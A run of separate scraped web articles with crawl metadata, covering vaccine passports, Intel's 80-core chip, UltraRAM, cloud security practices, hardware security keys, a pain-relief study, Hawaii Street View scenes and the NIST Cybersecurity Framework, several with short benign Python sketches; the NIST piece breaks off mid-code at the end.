- Balancing fraud protection and ease-of-use. For decades, travelers received signed and stamped “yellow cards” when they traveled to and from certain countries to prove they had been vaccinated against highly communicable diseases, such as yellow fever and cholera. This paper process relied on stamps and signatures from physicians and patients to verify identity and validate vaccination. While this paper-driven process makes it easy to create valid vaccine records at the point of vaccination, it could be prone to fraud if used as the foundation for a COVID-19 vaccine passport effort. In order to verify user identity and maximize public trust, proven digital identity and digital signature technologies will need to be used as the foundation for a modern vaccine passport solution (a minimal sketch of the sign-and-verify flow follows at the end of this piece). In addition to securing the validation process, the ability to quickly scan a digital QR code from a mobile phone would also help speed verification at ports of entry and departure, compared to complicated paper trails.
- Achieving widespread accessibility and interoperability. Today, more than a billion people worldwide are unable to prove their identity using traditional physical IDs, such as passports, birth certificates and driver licenses. Moving to a mobile-based vaccine passport strategy has the potential to create even greater accessibility gaps. Any viable vaccine passport solution will need to incorporate both mobile-based and smart card-based options to ensure every user who wants access to a vaccine passport can get one. From a validation standpoint, each vaccine passport solution that enters the market will also need to be universally recognized and scannable across countries and industries to ensure citizens can come and go as they please. Without this capability, a vaccine passport isn’t really a passport at all. In an effort to speed the rollout process, leveraging the validation technology and infrastructure already available in existing systems – such as the global passport system – may offer one way to increase the likelihood of interoperability.
The good news is the technology and infrastructure already exist to make a secure, accessible vaccine passport a reality. It’s now up to each of the incoming vaccine passport solutions to learn from past credentialing challenges and apply the right digital identity solutions to solve them.
This blog is the first in a three-part series titled “Trusted Vaccine Passports: Restoring a World in Motion.” In the next blog, we will explore the vaccine passport solutions currently in development and what a seamless, end-to-end vaccine credentialing process could look like.
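To make the digital-signature point above concrete, here is a minimal sketch using the Python cryptography library. It shows only the core sign-and-verify flow; real credential schemes add issuer key directories, QR encoding, and revocation, and the record fields below are invented for illustration.

```python
import json
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# The issuer (e.g., a health authority) generates a signing key pair once.
issuer_key = Ed25519PrivateKey.generate()
issuer_pub = issuer_key.public_key()

# Hypothetical record fields, serialized deterministically before signing.
record = json.dumps(
    {"name": "A. Traveler", "vaccine": "XYZ", "dose": 2, "date": "2021-04-01"},
    sort_keys=True,
).encode()

# The signature travels with the record (in practice, inside a QR code).
signature = issuer_key.sign(record)

# A verifier checks the record against the issuer's published public key.
try:
    issuer_pub.verify(signature, record)
    print("record is authentic")
except InvalidSignature:
    print("record was tampered with or not issued by this authority")
```

The key property is that verification needs only the issuer’s public key, so border agents and venues can validate credentials offline without ever handling the issuer’s signing key.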
<urn:uuid:5bf94501-9b81-434a-ac97-3278701db8b2>
CC-MAIN-2022-40
https://www.entrust.com/it/blog/2021/04/vaccine-passports-are-coming-what-can-we-learn-from-past-passport-rollouts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00133.warc.gz
en
0.935844
818
2.828125
3
CORRECTED: Intel Monday showed off its latest science project, a teraflop processor with 80 cores that, while it will never be productized, will help the company in its future CPU projects. The CPU was intended as a research project into how to develop an effective and efficient multicore processor, since Intel sees cores, not clock speed, as the means for performance advancement in the future.
“To increase performance, we need to scale out to parallelism. But then you have new issues to deal with, such as all the threads, an operating system that can parallelize the threads, caches that can handle simultaneous processes,” said Sean Koehl, technical strategist of the Terascale program at Intel.
The experiment proved insightful for Intel. “We have learned we’re able to create a high speed mesh that can handle terabits of data per second,” Koehl told internetnews.com. “Something you need to scale these processors is high bandwidth for core-to-core communication.”
The chip is not based on x86 or any existing design. The 80 cores are all floating point engines, each with its own high-speed controller for communicating with the other cores. The chip uses Intel’s new 45nm process and the recently announced new metals design that will allow for even smaller processors in the future. This enables energy efficiencies, such as the cores turning each other on and off to save power. “We think this is how we will scale performance in the future. The old manner of turning up clock speed is not proving energy efficient,” said Koehl.
One of the ongoing efforts is learning how applications operate in parallel. The terascale chip literally breaks an application or task into 80 pieces, and each core does its own small part of the computation before the results are reassembled. However, learning how to effectively design applications to run in parallel is a long process. Because they all behave differently, some applications can achieve the teraflop of throughput this chip is said to offer, while others run considerably slower.
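The decomposition Koehl describes is, in spirit, a scatter-gather pattern: split the work into pieces, compute each piece independently, then reassemble the result. Here is a generic Python sketch of that idea; it illustrates the concept only and has nothing to do with Intel’s actual hardware or toolchain.

```python
from multiprocessing import Pool

def partial_sum(chunk):
    """The 'small part' each core computes independently."""
    return sum(x * x for x in chunk)

if __name__ == "__main__":
    data = list(range(1_000_000))
    n_pieces = 80  # one piece per core, in the spirit of the 80-core chip
    # Scatter: stride-slice the data into n_pieces chunks.
    chunks = [data[i::n_pieces] for i in range(n_pieces)]
    with Pool(processes=8) as pool:  # use however many cores you actually have
        # Compute in parallel, then gather and reassemble.
        total = sum(pool.map(partial_sum, chunks))
    print(total)
```

A sum of squares parallelizes almost perfectly; as the article notes, applications whose pieces depend on each other communicate constantly and fall well short of peak throughput.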
<urn:uuid:25a8f3c9-4594-4e08-9e33-5a87cf47fdc6>
CC-MAIN-2022-40
https://cioupdate.com/intel-unveils-teraflop-processor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.941715
442
3.21875
3
IT is just beginning to understand the impact NVRAM will have on infrastructure. Jim Handy breaks down another potential new entrant into the market, based on research from Lancaster University. What they call “UltraRAM” uses triple-barrier resonant tunneling to create nonvolatile memory that can be read or written at low voltages. Low-voltage operation is the key: it means the memory would not suffer wear to the tunnel dielectric and would subsequently not leak charge off the floating gate, which is what causes flash to eventually become unreadable. The full piece goes into a lot more detail on the materials science behind the approach, but if UltraRAM can ever be brought to market, it seems to answer a lot of the existing issues with current DRAM and NAND approaches.
Read more at: University of Lancaster Invents Yet Another Memory
<urn:uuid:9951abdd-dbc9-486e-be0b-a3f9a03cb3dc>
CC-MAIN-2022-40
https://gestaltit.com/favorites/rich/are-we-ready-for-ultraram/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.944797
173
2.890625
3
Cloud security is a set of controls, policies, procedures, and technologies that protect data, infrastructure, and systems stored in cloud environments. Cloud security measures give businesses the processes and tools they need to keep their data safe, meet their regulatory compliance requirements, protect their customers’ privacy, and establish authentication rules around all of their users and devices. Security for cloud services offers the same functionality as traditional IT security while enabling businesses to enjoy the numerous benefits of cloud computing. Whether your business is working in a legacy, hybrid, or multi-cloud environment, keeping your data secure is crucial to the success of your company. Here, we’ll cover why cloud security is essential, and the best practices associated with successful cloud security programs.
Why cloud security is important
Operating in the cloud requires security measures that protect applications, data, and systems from corruption, deletion, leakage, and theft. Because cloud applications require no installation and can be accessed from anywhere with an internet connection, any information they host is theoretically more susceptible to cyber threats and hacking. Without protecting your cloud storage, your data and user information are at risk. To mitigate this risk, organizations need to implement the appropriate provisions against all cloud computing security threats, regardless of whether they run a native cloud, hybrid, or on-premises environment. By augmenting your cloud security posture, you can:
- Prevent existing cloud threats. Data stored in the cloud is readily accessible to cybercriminals if it isn’t secured with the appropriate protections. Unprotected data leaves organizations vulnerable to data loss, as well as risks like compromised APIs, account hijacking, malicious insider threats, mobile security threats, and weak access, credential, and identity management.
- Defend against evolving risks. The threat landscape is constantly changing as cybercriminals deploy increasingly sophisticated attack methods. It’s vital that companies keep their security defenses up to date.
- Centralize security. Cloud-based networks are accessed by thousands – and even millions – of users and devices from a range of locations at all hours. Managing this ebb and flow manually can be nearly impossible and increases the risk of leaving business data vulnerable to an attack. Streamlining access management and centralizing the protection of data enhances security and reduces administrators’ workloads.
- Reduce costs. Cloud infrastructure security removes the need for businesses to invest in dedicated, often expensive hardware. Cloud security offers 24/7 protection with minimal human intervention required, reducing capital expenditure and administrative overhead.
Use a best-in-class security platform to ensure your users and their data are protected, while freeing your administrators, IT, and security teams to spend less time on unnecessary administrative tasks and more on tasks that add value to your business.
Factors to consider when implementing cloud security
There are several questions that businesses should consider before investing in a cloud networking security solution.
- Has the solution provider been thoroughly vetted? A company is only as strong as the security solutions it adopts. Ensure that the security tools you choose for your cloud services are from trusted and proven providers.
- Can you automate your software updates? It’s no good having security in place to protect data if it doesn’t stay up to date with the latest threats. Ensure that software is set to install updates as and when they arrive. Automation also removes the risk of employees forgetting to update their software or devices.
- Does the solution meet your compliance requirements? Like the threat landscape, compliance regulations are also constantly changing. Businesses need to be aware of the compliance requirements of the various jurisdictions in which they store cloud-based personal, financial, and sensitive data – and have a solution that covers all those bases.
Cloud security best practices
There are several cloud security best practices that businesses can implement to ensure their solutions and teams are protected.
1. Deploy multi-factor authentication
Adaptive MFA is crucial to helping businesses add an extra layer of security to their cloud-based environments while improving user experiences. Passwords are no longer enough when it comes to protecting user accounts and sensitive business data. Along with stolen credentials, weak passwords are one of the easiest and most popular ways for hackers to gain unauthorized access to business systems: it’s estimated that 80% of security breaches involve compromised passwords. MFA requires employees, customers, and partners to verify their identity by providing a second piece of evidence – whether a one-time password or biometric verification – when attempting to access applications, devices, and systems. This process ensures businesses aren’t relying solely on username and password combinations to authenticate users.
2. Go passwordless
Once you’ve established MFA, the next step for many companies will be to move away from passwords altogether. Passwordless authentication enables businesses to:
- Leverage session risk to enhance the authentication experience.
- Provide one-click or one-touch authentication across desktop and mobile.
- Reduce IT helpdesk and support costs associated with password management.
- Minimize the risk – and cost – of data breaches caused by stolen or compromised credentials.
3. Manage user access
Employees really only require access to the applications and resources they need to get their job done. Providing users with access levels beyond what they need can leave a business open to credential theft and insider threat attacks. Organizations need to set appropriate levels of authorization to ensure that every employee is only able to view and access the applications and data they require (a minimal sketch of such a least-privilege check follows at the end of this piece). They can also set user access rights to prevent an employee from editing or deleting information they aren’t authorized to change, and to limit the damage if a hacker steals an employee’s credentials.
4. Constantly monitor activity
Given the elevated threat level facing cloud applications and systems, it’s important to regularly and systematically scan for irregular user activity. Businesses should carry out real-time analysis and monitoring to detect any actions that deviate from regular usage patterns, such as a user logging in from a new IP address or accessing an application from a new device. These irregularities can indicate a potential security breach, so real-time monitoring helps to stop a hacker before they can do any damage. And in the case where a user has accessed the system from a new device and triggered a benign alert, they can be quickly and easily verified through MFA. Solutions that help businesses monitor applications and systems in real time include endpoint detection and response, intrusion detection and response, and vulnerability scanning and remediation.
5. Automate onboarding and offboarding
When a new employee joins a company, they require access to the applications and systems they need to get up and running and do their job effectively. However, it’s equally important that as soon as an employee leaves the organization, their access to all data and resources is revoked. Automating the onboarding and offboarding process ensures that no mistakes are made and there’s no delay in deprovisioning user access, and it takes the burden of account maintenance off admins and IT teams.
6. Ongoing employee training
Having cloud computing security in place is important, but it’s also vital to ensure that your employees understand the risks they face. With password and credential theft so prevalent, employees are an organization’s first line of defense against hackers. Organizations need to provide regular training to keep security top of mind for employees. Teams should be trained to understand the signs of a phishing attack, what spoofed websites look like, and the tactics hackers use to target victims.
What makes cloud security different from on-premises security?
Unlike traditional, static data storage, the cloud is always changing. That means businesses need a security approach that is adaptable, automated, and evolving. Businesses should also be aware of the key differences between application security in the cloud and traditional IT security:
- The perimeter has shifted. In the past, businesses secured a network perimeter and then presumed everything behind it was trusted and everything outside it was not. But cloud environments are highly connected, enabling users to connect to business networks from multiple devices and various locations – in other words, people have become the new perimeter. With a growing number of users and devices, this distributed perimeter increases the risk of unauthorized access via account hijacks, insider threats, insecure APIs, and weak identity management processes. A new security mentality is required to strengthen authorization and authentication, protect identities, and encrypt data.
- Everything is software, and software requires security. A cloud computing infrastructure offers several hosted resources that are delivered to users through applications. These resources are dynamic, portable, and scalable, and are organized by cloud-based management systems and APIs. Cloud security controls accompany workloads and data at all times – whether at rest or in transit – to protect environments from corruption and data loss.
- The threats are more sophisticated. Modern computing, including the cloud, is susceptible to a growing range of increasingly sophisticated cyber threats. From malware to AI-enabled social engineering and advanced persistent threats (APTs), these threats are purposefully created to target vulnerabilities in businesses’ systems and networks. Cloud security is constantly evolving in response, and it’s imperative for organizations to keep pace and follow the latest best practices to prevent emerging threats.
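As a concrete illustration of the least-privilege idea in practice 3, here is a minimal sketch. The roles and permission strings are invented for illustration; a real deployment would query an IAM service rather than an in-memory table.

```python
# Hypothetical role -> permission mapping (least privilege: no role gets "everything").
ROLE_PERMISSIONS = {
    "support": {"tickets:read", "tickets:write"},
    "analyst": {"reports:read"},
    "admin":   {"tickets:read", "tickets:write", "reports:read", "users:manage"},
}

def is_authorized(role: str, permission: str) -> bool:
    """Deny by default; allow only permissions explicitly granted to the role."""
    return permission in ROLE_PERMISSIONS.get(role, set())

assert is_authorized("analyst", "reports:read")
assert not is_authorized("analyst", "users:manage")   # least privilege in action
assert not is_authorized("contractor", "reports:read")  # unknown role -> denied
```

The deny-by-default shape is the important part: an attacker who steals an analyst’s credentials gets only what the analyst role explicitly grants, nothing more.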
<urn:uuid:81bcfc36-8bf8-4d5d-ae7e-04ca64d10d18>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/cloud-security-basics-best-practices-implementation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.934247
1,899
2.65625
3
Protecting your online accounts has become more important, as so much of our lives takes place on websites, via email, and through messaging. If someone gets access to some of your accounts – especially your email account – they can get access to others, and potentially usurp your identity. In order to ensure security, most sensitive services now offer two-factor authentication (sometimes called two-step authentication). This combines something you know – your user name and password – with something you have, which is generally a code that is generated on demand. In many cases, these codes are sent by SMS text messages, and must be used within a few minutes. But SMS is inherently insecure, and other methods are needed to ensure optimal security. Security keys are another way to add an additional authentication factor. They are portable, like flash drives, and easy to use. In this article, I’m going to explain why you might want to use a security key to protect certain accounts, how to set one up, and how to use it.
Why SMS is insecure
SMS is practical and fast, but it has security risks. SMS messages are not encrypted, and can be intercepted in transit. Someone could steal your phone, and, even if they can’t unlock it, if you have your device set to show the content of your messages on the lock screen, they can see your codes as they arrive. Or someone could clone your phone, getting a SIM card with the same number as yours and intercepting your messages in real time.
Authenticator apps are another option. They create unique, time-limited, one-time passwords. Each code is valid for thirty seconds, because both the server you’re logging into and the authenticator app know what time it is. Your authenticator app, or the password manager handling these codes, shows a countdown as the time progresses, and generates a new code when the time runs out.
A security key is essentially a mini flash drive that contains a tiny bit of data: a cryptographic key. When you plug it into your computer, that data is read, and it works like a key in a lock, providing a second factor that unlocks a digital door. Unless someone has your security key, they can’t get into your account. Security keys use the FIDO2 protocol, which has been widely adopted by major tech companies, but is far from universal. (A minimal sketch of the challenge-response idea behind FIDO2 follows at the end of this article.)
Why use a security key?
You don’t use a security key as much for your own logins but rather to prevent others from accessing your accounts. It may seem to be a hassle to have to stick a key into a USB port every time you log into a website with a new device, but you generally only have to do it once on each device. From that point on, you can choose to trust your device and you won’t need to use the key again for some time (many services require a new, full login, whether with a one-time code or security key, at regular intervals). And if you lose the security key, you can revoke it on the website, so no one else can use it to access your account.
Because of the various types of ports and connectors used on computing devices, security keys come in many versions. This can be a problem if you want to use a key with, say, an iMac, a MacBook Pro, an iPhone, and an iPad. Some keys work with NFC (near-field communication), allowing wireless recognition with iPhones, but not iPads, and others are available with Bluetooth. One brand, Yubico, makes its keys in the following versions:
- USB-C and Lightning
- USB-A and NFC
- USB-C and NFC
You can use adapters for the different USB plugs, so a USB-C key will also work with a USB-A port or vice versa. Google’s Titan Security Key is available in a bundle that includes:
- USB-A and NFC
- Bluetooth
The Titan Security Key bundle includes a USB-A to USB-C adapter, and a mini-USB to USB-A adapter for the Bluetooth key, which allows it to work via USB but also to charge the device, which contains a battery. I tried both of these security keys, each of which costs about $50, and the Google bundle was by far the most practical: Bluetooth is more widely supported than NFC, and all my portable Apple devices can work with this key.
Which services support security keys?
A wide range of services support security keys. You can protect your Google and Microsoft accounts, you can use a security key with Dropbox, Twitter, Facebook, Instagram, and YouTube, and a number of password managers support these devices. One absence is Apple services, because Apple uses its own method for two-factor authentication, based on the company’s chain of trust across devices. However, you can use a security key to protect your Mac, as a variant of the “smart card” authentication available since macOS 10.13. The key is required each time you log into your Mac; it’s a fairly complicated process, and should only be set up by experienced system administrators.
It’s worth noting that Google has an Advanced Protection Program for “users with high visibility and sensitive information, who are at risk of targeted online attacks.” Designed for journalists, activists, and politicians, this requires the use of a hardware key.
Setting up a security key
In general, setting up a security key is simple, but it’s not always easy. While Yubico lists many services that support security keys, some of them actually only use the YubiKey via the company’s Yubico Authenticator app to generate one-time codes. While using the key this way is slightly more secure than generating a code with an authenticator app, it’s probably not worth the extra step. Google doesn’t provide much information on how to use its Titan Security Key, other than what you will find for setting up your Google account. But Google’s instructions are a good way to see how this works, and most services have similar procedures for adding a security key to your account.
If you haven’t yet turned on two-factor authentication for your account, then you must do so; the security key is the second factor. If you already have two-factor authentication enabled, then you’ll want to add the security key and turn off text messaging if you had that enabled. You then “enroll” your security key; as you see in the screenshot below, I could use my iPhone as a security key, but if you click the second option, you can add a hardware key. You then connect the security key, and Google registers it, and that’s all there is to do. It’s worth noting that to be able to use a Bluetooth security key on other devices, you need to first connect it physically to a computer when enrolling it, using the supplied cable. After that, you can use the device via Bluetooth to log in on an iPhone or iPad: just press a button on the Bluetooth security key when prompted during login.
Not all services allow you to use multiple security keys, but Google does, and this can be practical to ensure you have backups. With some services, you can choose to have multiple authentication methods active. For example, Twitter allows you to use text messages, an authenticator app, and/or a security key, but notes that you can’t use a security key with its mobile app. There are risks that these hardware devices may not work, because the device you’re using to log in isn’t compatible, or because you’ve lost the security key. Most services that offer two-factor authentication with an authenticator app or security key also provide backup codes, which you can use if your preferred method isn’t available. With some services, such as Twitter, this is a single code; with others, such as Google, you get ten single-use codes. Once you’ve used a code, you can’t use it again (but you can always generate new codes). And since, as above, you can use both a security key and an authenticator app with Twitter, it might be best to allow both options.
Computer security is always a trade-off between robustness and convenience. While a hardware security key is one of the most secure ways of protecting your accounts, it is not the most convenient. But that extra step is generally something you only need to do occasionally: unless you log into public or shared computers often, you use it only when you log into a new device, or every month or so, depending on how often the service wants you to reconfirm your identity.
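For the technically curious, the heart of what a FIDO2 key does at login is a public-key challenge-response. The sketch below, using the Python cryptography library, models only that core idea; it is not the real FIDO2/WebAuthn protocol, which also binds the web origin, counts authentications to resist cloning, and keeps the private key sealed inside the hardware.

```python
import os
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Enrollment: the key generates a key pair; only the public half leaves the device.
device_key = Ed25519PrivateKey.generate()
registered_public_key = device_key.public_key()  # stored by the website

# Login: the website sends a fresh random challenge...
challenge = os.urandom(32)

# ...the security key signs it (this is the "press the button" moment)...
assertion = device_key.sign(challenge)

# ...and the site verifies the signature against the enrolled public key.
# verify() raises InvalidSignature if the response didn't come from the real key.
registered_public_key.verify(assertion, challenge)
print("second factor verified: the user holds the enrolled key")
```

Because the challenge is random and never reused, an intercepted response is useless for future logins, which is precisely the weakness of SMS codes described above.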
<urn:uuid:70f457cd-bd28-48d5-a01e-cf2c3a56830c>
CC-MAIN-2022-40
https://www.intego.com/mac-security-blog/how-to-use-a-security-key-to-protect-sensitive-online-accounts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.936778
1,843
2.609375
3
Is pain treatment more helpful if it is provided by a friend, or is the help of a stranger better? A study conducted by researchers from the Universities of Würzburg, Amsterdam and Zurich investigated this question and found that people experience stronger pain relief if they are treated by a person from a different social group. The study has been published in the latest issue of Proceedings of the Royal Society B: Biological Sciences. It was led by Grit Hein, a psychologist, neuroscientist and professor of Translational Social Neuroscience at the Center of Mental Health of the Würzburg University Hospital, who teamed up with Jan B. Engelmann (Amsterdam) and Philippe N. Tobler (Zurich).
“Participants experienced induced pain on the back of their hand. In one group of participants, this pain was relieved by a person from their own social group, and another group of participants received pain relief from a person from a different group. We measured how the pain relief treatment changed neural pain responses and subjective pain judgments.” That is how Grit Hein describes the scientists’ approach.
Treatment by a stranger was more efficient
“Before the treatment, both groups showed similarly strong responses to pain,” Grit Hein explains. In contrast, after being treated by what they considered a ‘stranger’, the participants from this group rated their pain as less intense than the other group did. The effect was not limited to the subjective pain experience: “We also saw a reduction of the pain-related activation in the corresponding brain regions,” the scientist says.
Perhaps surprising to the lay person, the finding is in line with a core principle of learning theory, according to which people learn particularly well when the results differ significantly from what they had expected. In psychological language this is called “prediction error learning,” in which the surprise contributes to “rooting” the new experience more effectively in the brain. “The participants who received pain relief from an outgroup member had not expected to actually get effective help from this person,” the neuroscientist explains. And the less the participants had anticipated positive experiences, the bigger their surprise when the pain actually subsided, and the more pronounced the reduction of their pain responses. “Of course, this finding still needs to be verified outside the laboratory,” says Grit Hein. “But it could be relevant for the clinical context, where treatment by nurses and doctors from different cultures is common today.”
More information: Pain relief provided by an outgroup member enhances analgesia, Proceedings of the Royal Society B, rspb.royalsocietypublishing.or … .1098/rspb.2018.0501
Journal reference: Proceedings of the Royal Society B
Provided by: University of Würzburg
<urn:uuid:6a769c4b-8f29-4737-8f1b-3a922d2f8faf>
CC-MAIN-2022-40
https://debuglies.com/2018/09/26/people-experience-stronger-pain-relief-if-they-are-treated-by-a-person-from-a-different-social-group/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00333.warc.gz
en
0.94685
603
2.65625
3
2. Pololu Valley Cliffs
3. Trail View of the Pololu Valley
4. Petroglyphs Found in Hawaii Volcanoes National Park
The Pu’u Loa Petroglyphs, known as “kii pohaku” in Hawaiian, are lava rock carvings made by Native Hawaiians, according to the HVCB. The largest group of these artifacts is found in the Hawaii Volcanoes National Park, where more than 23,000 images are visible. Here are some of the lava outcrops that can be observed along the path to the petroglyphs field.
5. Carving in Solidified Lava
6. More Petroglyphs Carved Into Rock Outcroppings
7. Sunset on a Beach on the Big Island
8. Smooth Sands of Hapuna Beach
9. Tranquil Bay at Hapuna Beach
10. Waves Cresting at Hapuna Beach
11. Kau Forest Reserve
Not all of Hawaii is beaches and waves. In the Kau Forest Reserve, a critical watershed is present that provides fresh water for residents, according to the HVCB. The forest includes a native ecosystem for endangered indigenous birds and plants. There are no designated state-managed hiking trails in this forest, so visitors are able to see it through Google Street View.
12. Rim of a Crater
On the challenging 11-mile Crater Rim Trail in the Hawaii Volcanoes National Park, visitors can explore an active volcano and see spectacular views like this one of the rim of the crater. Much of the trail is closed due to volcanic activity in Halemaumau crater, according to the HVCB, but visitors are able to see lots of wildlife and amazing scenery.
13. Hardened Lava Rock Flows
14. Volcano Crater on the Kilauea Iki Trail
This huge volcano crater dominates this scene on the Kilauea Iki Trail in the Hawaii Volcanoes National Park, where good hiking shoes will be needed by those who want to take on the challenging trail, according to the HVCB. The trail descends 400 feet to the crater floor, where steam vents and the Puu Puai cinder cone are also visible.
15. Lava Rock on the Kilauea Iki Trail
16. Hawaii’s Largest Cinder Cone
17. This Isn’t Africa
In the Hakalau Forest National Wildlife Refuge, the flora and fauna of a native Hawaiian forest can be explored, provided you have reservations when you visit, according to the HVCB. In this image, it doesn’t look like a lush forest that one might expect to find in Hawaii, but appears to be a dry forest that might be found in Africa.
18. 442-Foot Akaka Falls
Located in Akaka Falls State Park on the northeastern Hamakua Coast of Hawaii, the 442-foot-high Akaka Falls provides a breathtaking backdrop for a visit to the area, as shown in this spectacular image. Visitors travel through a lush rain forest to reach the falls, according to the HVCB, where they can also visit the nearby 100-foot Kahuna Falls.
NIST Cybersecurity Framework

What is the NIST Cybersecurity Framework?

The National Institute of Standards and Technology (NIST) is a non-regulatory agency that promotes innovation by advancing measurement science, standards, and technology. The NIST Cybersecurity Framework (NIST CSF) consists of standards, guidelines, and best practices that help organizations improve their management of cybersecurity risk. The NIST CSF is designed to be flexible enough to integrate with the existing security processes within any organization, in any industry. It provides an excellent starting point for implementing information security and cybersecurity risk management in virtually any private sector organization in the United States.

History of the NIST Cybersecurity Framework

On February 12, 2013, Executive Order (EO) 13636—"Improving Critical Infrastructure Cybersecurity"—was issued. This began NIST's work with the U.S. private sector to "identify existing voluntary consensus standards and industry best practices to build them into a Cybersecurity Framework." The result of this collaboration was the NIST Cybersecurity Framework Version 1.0. The Cybersecurity Enhancement Act (CEA) of 2014 broadened NIST's efforts in developing the Cybersecurity Framework. Today, the NIST CSF is still one of the most widely adopted security frameworks across all U.S. industries.

NIST Cybersecurity Framework core structure

The NIST Cybersecurity Framework includes functions, categories, subcategories, and informative references. Functions give a general overview of security best practices. They are not intended to be procedural steps but are to be performed "concurrently and continuously to form an operational culture that addresses the dynamic cybersecurity risk." Categories and subcategories provide more concrete action plans for specific departments or processes within an organization. The NIST functions and their categories include the following (a minimal code encoding follows this list):

- Identify: To protect against cyberattacks, the cybersecurity team needs a thorough understanding of the organization's most important assets and resources. The identify function includes such categories as asset management, business environment, governance, risk assessment, risk management strategy, and supply chain risk management.
- Protect: The protect function covers much of the technical and physical security controls for developing and implementing appropriate safeguards and protecting critical infrastructure. Its categories are identity management and access control, awareness and training, data security, information protection processes and procedures, maintenance, and protective technology.
- Detect: The detect function implements measures that alert an organization to cyberattacks. Detect categories include anomalies and events, security continuous monitoring, and detection processes.
- Respond: The respond function categories ensure the appropriate response to cyberattacks and other cybersecurity events. Specific categories include response planning, communications, analysis, mitigation, and improvements.
- Recover: Recovery activities implement plans for cyber resilience and ensure business continuity in the event of a cyberattack, security breach, or other cybersecurity event. The recover categories are recovery planning, improvements, and communications.
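Because the core is just a hierarchy of functions, categories, and subcategories, it maps naturally onto a simple data structure. The following Python sketch is not part of the framework itself; it merely encodes the function-to-category summary above in a form a team could use to drive checklists or reports.

```python
# Minimal encoding of the CSF core as nested data (subcategories omitted).
CSF_CORE = {
    "Identify": ["Asset Management", "Business Environment", "Governance",
                 "Risk Assessment", "Risk Management Strategy",
                 "Supply Chain Risk Management"],
    "Protect":  ["Identity Management and Access Control",
                 "Awareness and Training", "Data Security",
                 "Information Protection Processes and Procedures",
                 "Maintenance", "Protective Technology"],
    "Detect":   ["Anomalies and Events", "Security Continuous Monitoring",
                 "Detection Processes"],
    "Respond":  ["Response Planning", "Communications", "Analysis",
                 "Mitigation", "Improvements"],
    "Recover":  ["Recovery Planning", "Improvements", "Communications"],
}

def categories(function):
    """Look up the categories that belong to one of the five functions."""
    return CSF_CORE[function]

print(categories("Recover"))  # -> ['Recovery Planning', 'Improvements', ...]
```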
The NIST CSF's informative references draw a direct correlation between the functions, categories, and subcategories and the specific security controls of other frameworks. These frameworks include the Center for Internet Security (CIS) Controls®, COBIT 5, International Society of Automation (ISA) 62443-2-1:2009, ISA 62443-3-3:2013, ISO/IEC 27001:2013 (from the International Organization for Standardization and the International Electrotechnical Commission), and NIST SP 800-53 Rev. 4.

The NIST CSF does not specify how to inventory physical devices and systems or how to inventory software platforms and applications; it merely provides a checklist of tasks to be completed. An organization can choose its own method for performing the inventory. If an organization needs further guidance, it can refer to the informative references to related controls in other complementary standards. There is a lot of freedom in the CSF to pick and choose the tools that best suit the cybersecurity risk management needs of an organization.

NIST Framework implementation tiers

To help private sector organizations measure their progress towards implementing the NIST Cybersecurity Framework, the framework identifies four implementation tiers:

- Tier 1 – Partial: The organization is familiar with the NIST CSF and may have implemented some aspects of control in some areas of the infrastructure. Implementation of cybersecurity activities and protocols has been reactive rather than planned. The organization has limited awareness of cybersecurity risks and lacks the processes and resources to enable information security.
- Tier 2 – Risk Informed: The organization is more aware of cybersecurity risks and shares information on an informal basis. It lacks a planned, repeatable, and proactive organization-wide cybersecurity risk management process.
- Tier 3 – Repeatable: The organization and its senior executives are aware of cybersecurity risks. They have implemented a repeatable, organization-wide cybersecurity risk management plan. The cybersecurity team has created an action plan to monitor and respond effectively to cyberattacks.
- Tier 4 – Adaptive: The organization is now cyber resilient and uses lessons learned and predictive indicators to prevent cyberattacks. The cybersecurity team continuously improves and advances the organization's cybersecurity technologies and practices and adapts to changes in threats quickly and efficiently. There is an organization-wide approach to information security risk management, with risk-informed decision-making, policies, procedures, and processes. Adaptive organizations incorporate cybersecurity risk management into budget decisions and organizational culture.

Establishing a NIST Framework cybersecurity risk management program

The NIST Cybersecurity Framework provides a step-by-step guide on how to establish or improve an information security risk management program:

- Prioritize and scope: Create a clear idea of the scope of the project and identify the priorities. Establish the high-level business or mission objectives and business needs, and determine the risk tolerance of the organization.
- Orient: Take stock of the organization's assets and systems and identify applicable regulations, the risk approach, and threats to which the organization might be exposed.
- Create a current profile: A current profile is a snapshot of how the organization is managing risk at present, as defined by the categories and subcategories of the CSF.
- Conduct a risk assessment: Evaluate the operational environment, emerging risks, and cybersecurity threat information to determine the probability and severity of a cybersecurity event that could impact the organization.
- Create a target profile: A target profile represents the risk management goal of the information security team.
- Determine, analyze, and prioritize gaps: By identifying the gaps between the current and target profiles, the information security team can create an action plan, including measurable milestones and the resources (people, budget, time) required to fill these gaps.
- Implement the action plan: Carry out the action plan defined in the previous step.

NIST CSF and the IBM Cloud

IBM has many resources available about how to adopt the NIST Cybersecurity Framework, along with a variety of security framework and risk assessment services for evaluating an organization's security posture. Businesses can use these services to identify vulnerabilities and mitigate risks: they provide network monitoring and management, enhance privacy and security options, and help identify security risks. IBM also can help align security standards and practices to the NIST CSF in a cloud environment.
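Returning to the gap-analysis step above: comparing a current profile to a target profile is essentially a scoring exercise, so it is easy to prototype. In the Python sketch below, the profile data and the 0-4 maturity scale are assumptions for illustration, not an official NIST or IBM scoring method.

```python
# Hypothetical maturity scores per CSF category, on an assumed 0-4 scale.
current = {"Asset Management": 1, "Data Security": 2, "Detection Processes": 0}
target  = {"Asset Management": 3, "Data Security": 3, "Detection Processes": 3}

def prioritized_gaps(current, target):
    """Return (category, gap) pairs, largest gap first."""
    gaps = [(cat, target[cat] - current.get(cat, 0)) for cat in target]
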